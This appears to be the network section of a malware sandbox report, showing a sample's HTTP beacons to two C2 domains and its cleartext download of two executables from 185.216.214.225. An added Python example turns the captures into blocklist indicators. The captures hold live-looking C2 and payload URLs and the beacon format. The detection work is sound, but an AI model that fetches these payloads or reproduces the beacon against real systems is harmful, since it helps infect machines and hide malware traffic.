Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
garageserviceoperation.com | 172.67.202.34 | |
solutionhub.cc | 172.67.128.126 | |
GET 200 https://garageserviceoperation.com/socket/?serviceCheckup
REQUEST
GET /socket/?serviceCheckup HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com
Cache-Control: no-cache
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fjtrr4k3be7plstscs0h21opip; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eruxclufAgmQL6ON%2BYxLmP8wpv9d66SSxqCyxT1uwnDT0ASgLT4psaHZMhITX0gepFX5uZrAjXc2svhBNfLDzTZY%2FxllFfZW%2BX1Fq9TNOMZLGIsPillQGtzSrgeg%2BqJVcjbQbTQCcdOM3LXkyg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f312f8162ae0-LAX
alt-svc: h3=":443"; ma=86400
GET 200 https://solutionhub.cc/socket/?serviceCheckup
REQUEST
GET /socket/?serviceCheckup HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: solutionhub.cc
Cache-Control: no-cache
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=g164be67jtcif3jhpc7eabg7a7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SLzkz1fVOw5EwZMyDuEQius4XlpEQv1AOBszb4pwT9VL1h00%2BcgY0VeKvsVU8enws7FWWZy1MyfvFAQByJwIgIZSpQ%2FdvYi6S9FeAEjflvoYaa%2B1at2FPsXIQ%2FPYT%2BQ%2F8A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f318bfc60ffc-LAX
alt-svc: h3=":443"; ma=86400
GET 200 https://garageserviceoperation.com/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62
REQUEST
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62 HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com
Cache-Control: no-cache
Cookie: PHPSESSID=fjtrr4k3be7plstscs0h21opip
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1uPxJ%2FUhcHFI%2FGEjKuX6RuY1MWPPnkoxDSnFAQcaR9atxWn%2B%2BS13wfUQzaE7ABYh%2Be6QBHK3tOzim3aI4bj86vJfTVw5V6C%2FIxAsUZ5Gy2S4Fh8RXKwJ7ijwJzskBz6oTdlQ1HK5usq98fvPnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f3235c762ae0-LAX
alt-svc: h3=":443"; ma=86400
GET 200 https://garageserviceoperation.com/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62&tsk=5F9ADE
REQUEST
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62&tsk=5F9ADE HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com
Cache-Control: no-cache
Cookie: PHPSESSID=fjtrr4k3be7plstscs0h21opip
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TbADjrrCCQYLWnpzOxnTTcLS%2BdgQYzWG2MgMxj%2FwzykIw1U3HFrPgWgG6cL3anjT7Xz6gfwFyV6CjOTgq5%2FGzDPjHZuzOQxsCV99Wtg4HL6dgXPf%2Fc7973vX8Aikfo9L22WUVuDjWsRpcwGHyg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f330ca915301-LAX
alt-svc: h3=":443"; ma=86400
GET 200 https://garageserviceoperation.com/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62&tsk=5F9ADF
REQUEST
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62&tsk=5F9ADF HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com
Cache-Control: no-cache
Cookie: PHPSESSID=fjtrr4k3be7plstscs0h21opip
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TK6wS7n1mfCzFq6hvWVU13qGomSfA3HaARHk9fngycZW4ftZ1kRTIW4BqyfJjVpAK4Tlko%2BKgdYjuozLQnd7Cu9jnmr8OUprzlkAPQtpV5mC1R7Yv7SDFPcus3BtQ4v2LsCvKyzeU1P8SAPCOA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f33f1c765301-LAX
alt-svc: h3=":443"; ma=86400
GET 200 https://garageserviceoperation.com/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62
REQUEST
GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62 HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com
Cache-Control: no-cache
Cookie: PHPSESSID=fjtrr4k3be7plstscs0h21opip
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:19:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F1LvSjMK2EDY0BP4YBzbAbmis0DuNlpwxku86Qy3WyIksM4rPDqr5suvWGEhO%2BBYgxWVzMIfSYRnPWPcv9sajCZa%2BCQLAi1hK6vQpjrgzKnbny1VukxaJ95DJbHRs5bACfmua5CSj%2B5Fm8W3Rg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b49f4b96e2d5301-LAX
alt-svc: h3=":443"; ma=86400
GET 200 http://185.216.214.225/freedom.exe
REQUEST
GET /freedom.exe HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: 185.216.214.225
Cache-Control: no-cache
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:24 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Thu, 08 Aug 2024 03:39:14 GMT
ETag: "17800-61f23c5420f4f"
Accept-Ranges: bytes
Content-Length: 96256
Content-Type: application/x-msdos-program
GET 200 http://185.216.214.225/Jhiidutz.exe
REQUEST
GET /Jhiidutz.exe HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: 185.216.214.225
Cache-Control: no-cache
RESPONSE
HTTP/1.1 200 OK
Date: Sat, 17 Aug 2024 13:18:26 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 09 Aug 2024 00:59:07 GMT
ETag: "a5000-61f35a680ff51"
Accept-Ranges: bytes
Content-Length: 675840
Content-Type: application/x-msdos-program
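The captures above form one beacon sequence: a bare `/socket/?serviceCheckup` probe to two domains, a full check-in carrying hex-encoded `id`, `us`, `mn`, `os` and `bld` parameters, polls that add a `tsk` value, and two cleartext executable downloads from 185.216.214.225 served by Apache. Two details matter for detection: every request carries the non-browser User-Agent `Mozilla/5.0 (OpiumG4ng Win32)`, and both C2 domains answer from Cloudflare (`Server: cloudflare`, 172.67.0.0/16), so the resolved IPs are shared infrastructure and the Host header or TLS SNI is the right pivot, not the address. The script below is an added example and not part of the sandbox report: it parses captures transcribed from this page, labels each exchange with a stage name (`check_in`, `register`, `task_poll`, `payload_download`; these names and the URI rules are this example's own assumptions about the beacon format, inferred from the visible URIs only) and collapses them into the indicators a blocklist or Suricata rule would use.

```python
"""Turn captured HTTP exchanges into C2 indicators (added example, not part
of the report). The sample captures are transcribed from the report above;
the stage names and the URI rules are this example's own assumptions."""
from urllib.parse import parse_qs, urlsplit

C2_USER_AGENT_MARKER = "OpiumG4ng"                    # on every request above
C2_PATH = "/socket/"
REGISTRATION_PARAMS = ("id", "us", "mn", "os", "bld")  # first full beacon
TASK_PARAM = "tsk"                                    # follow-up polls
EXECUTABLE_CONTENT_TYPES = {"application/x-msdos-program"}

# Constructed from the report: (scheme from the URL column, request headers,
# blank line, response status line and the headers the rules look at).
SAMPLE_EXCHANGES = [
    ("https", """GET /socket/?serviceCheckup HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: cloudflare"""),
    ("https", """GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62 HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com
Cookie: PHPSESSID=fjtrr4k3be7plstscs0h21opip

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: cloudflare"""),
    ("https", """GET /socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3BCD138B5AFFC62&tsk=5F9ADE HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: garageserviceoperation.com

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: cloudflare"""),
    ("http", """GET /freedom.exe HTTP/1.1
User-Agent: Mozilla/5.0 (OpiumG4ng Win32)
Host: 185.216.214.225

HTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 96256
Content-Type: application/x-msdos-program"""),
]


def _headers(lines):
    """Header lines -> dict with lower-cased names (duplicates: last wins)."""
    out = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            out[name.strip().lower()] = value.strip()
    return out


def parse_exchange(scheme, raw):
    """Split one capture into the request/response fields the rules use."""
    req_text, _, resp_text = raw.strip().partition("\n\n")
    req_lines, resp_lines = req_text.splitlines(), resp_text.splitlines()
    method, target, _version = req_lines[0].split(" ", 2)
    req_headers, resp_headers = _headers(req_lines[1:]), _headers(resp_lines[1:])
    host = req_headers.get("host", "")
    parts = urlsplit(target)
    return {
        "method": method, "scheme": scheme, "host": host,
        "url": f"{scheme}://{host}{target}",
        "path": parts.path,
        "query": parse_qs(parts.query, keep_blank_values=True),
        "status": int(resp_lines[0].split()[1]) if resp_lines else None,
        "req_headers": req_headers, "resp_headers": resp_headers,
    }


def classify(ex):
    """Name the beacon stage from the URI shape; payloads from the content type."""
    ctype = ex["resp_headers"].get("content-type", "").split(";")[0].strip()
    if ctype in EXECUTABLE_CONTENT_TYPES or ex["path"].lower().endswith(".exe"):
        return "payload_download"
    if ex["path"] == C2_PATH:
        if TASK_PARAM in ex["query"]:
            return "task_poll"
        if all(p in ex["query"] for p in REGISTRATION_PARAMS):
            return "register"
        if "serviceCheckup" in ex["query"]:
            return "check_in"
    return "other"


def flags(ex):
    """Why the exchange deserves an alert, and what to pivot on."""
    out = []
    if C2_USER_AGENT_MARKER in ex["req_headers"].get("user-agent", ""):
        out.append("c2-user-agent")
    if ex["resp_headers"].get("server", "").lower() == "cloudflare":
        out.append("cdn-fronted")          # shared IP space: pivot on Host/SNI
    if ex["scheme"] == "http" and classify(ex) == "payload_download":
        out.append("cleartext-executable")  # full file visible on the wire
    return out


def analyze(samples=SAMPLE_EXCHANGES):
    results = []
    for scheme, raw in samples:
        ex = parse_exchange(scheme, raw)
        ex["stage"], ex["flags"] = classify(ex), flags(ex)
        results.append(ex)
    return results


def iocs(results):
    """Collapse analysed exchanges into blocklist-ready indicators."""
    hits = [r for r in results if "c2-user-agent" in r["flags"]]
    return {
        "hosts": sorted({r["host"] for r in hits}),
        "user_agents": sorted({r["req_headers"]["user-agent"] for r in hits}),
        "payloads": {r["url"]: int(r["resp_headers"].get("content-length", 0))
                     for r in results if r["stage"] == "payload_download"},
    }


if __name__ == "__main__":
    res = analyze()
    for r in res:
        print(f"{r['stage']:17} {r['url'][:60]:60} {','.join(r['flags'])}")
    print(iocs(res))
```

Run as-is it prints one line per exchange plus the aggregated indicator set. The `hosts` list deliberately contains the domain names and the payload IP but not 172.67.202.34 or 172.67.128.126: blocking those would break unrelated Cloudflare-hosted sites, whereas the Host/SNI values and the User-Agent string are specific to this sample.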
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49161 -> 172.67.202.34:443 | C=US, O=Google Trust Services, CN=WE1 | CN=garageserviceoperation.com | 9f:3e:b4:17:d0:54:94:2b:eb:35:8b:e9:ac:dd:e0:db:91:a5:35:e4 |
TLSv1 192.168.56.101:49163 -> 172.67.128.126:443 | C=US, O=Google Trust Services, CN=WE1 | CN=solutionhub.cc | a6:65:a4:77:51:a8:ca:dc:be:0c:0f:5b:5e:b4:fc:d4:cf:fb:24:09 |
TLSv1 192.168.56.101:49165 -> 172.67.202.34:443 | C=US, O=Google Trust Services, CN=WE1 | CN=garageserviceoperation.com | 9f:3e:b4:17:d0:54:94:2b:eb:35:8b:e9:ac:dd:e0:db:91:a5:35:e4 |
Snort Alerts
No Snort Alerts